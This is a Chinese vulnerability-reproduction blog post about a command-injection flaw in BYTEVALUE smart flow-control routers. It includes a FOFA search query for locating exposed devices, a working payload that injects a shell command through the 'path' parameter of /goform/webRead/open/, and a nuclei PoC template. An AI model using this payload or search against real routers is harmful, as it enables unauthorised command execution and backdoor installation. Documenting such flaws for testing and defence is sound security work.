【漏洞复现】百为智能流控路由器命令执行漏洞

admin 2023年12月2日03:52:44评论62 views字数 805阅读2分41秒阅读模式

大家可以把蚁剑安全实验室设为星标”,这样就可以及时看到我们最新发布的“漏洞预警”及“漏洞复现”的安全内容啦!

【漏洞复现】百为智能流控路由器命令执行漏洞


免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

一、漏洞描述

百为智能流控路由器是一款专业让网速流畅的路由器,专业为网吧、小区量身定做,让网速流畅的路由器,使用智能流量控制、多线路扩展及智能分流、智能业务识别、智能QoS等技术来实现线路带宽的充分利用,不浪费线路带宽。

该路由器存在命令注入执行漏洞,攻击者可通过此漏洞进行执行命令,写入后门,获取服务器权限等危害。

二、漏洞复现

1、fofa语法查找:title="BYTEVALUE 智能流控路由器"

【漏洞复现】百为智能流控路由器命令执行漏洞

2、路由器登录页面如下:

【漏洞复现】百为智能流控路由器命令执行漏洞

3、使用burp工具进行抓包,接着构造命令执行请求包,查看响应的内容(或直接拼接payload

payload:/goform/webRead/open/?path=|whoam

【漏洞复现】百为智能流控路由器命令执行漏洞

【漏洞复现】百为智能流控路由器命令执行漏洞

【漏洞复现】百为智能流控路由器命令执行漏洞
4、nuclei测试POC如下:

id: BYTEVALUE-Rceinfo:  name: BYTEVALUE-Rce  author: BYTEVALUE-Rce  severity: critical  tags: BYTEVALUE http:  - raw:    - |        GET /goform/webRead/open/?path=|whoami HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded     matchers-condition: and    matchers:      - type: word        words:          - "admin"      - type: status        status:          - 200

原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】百为智能流控路由器命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月2日03:52:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】百为智能流控路由器命令执行漏洞https://cn-sec.com/archives/2255854.html

发表评论

匿名网友 填写信息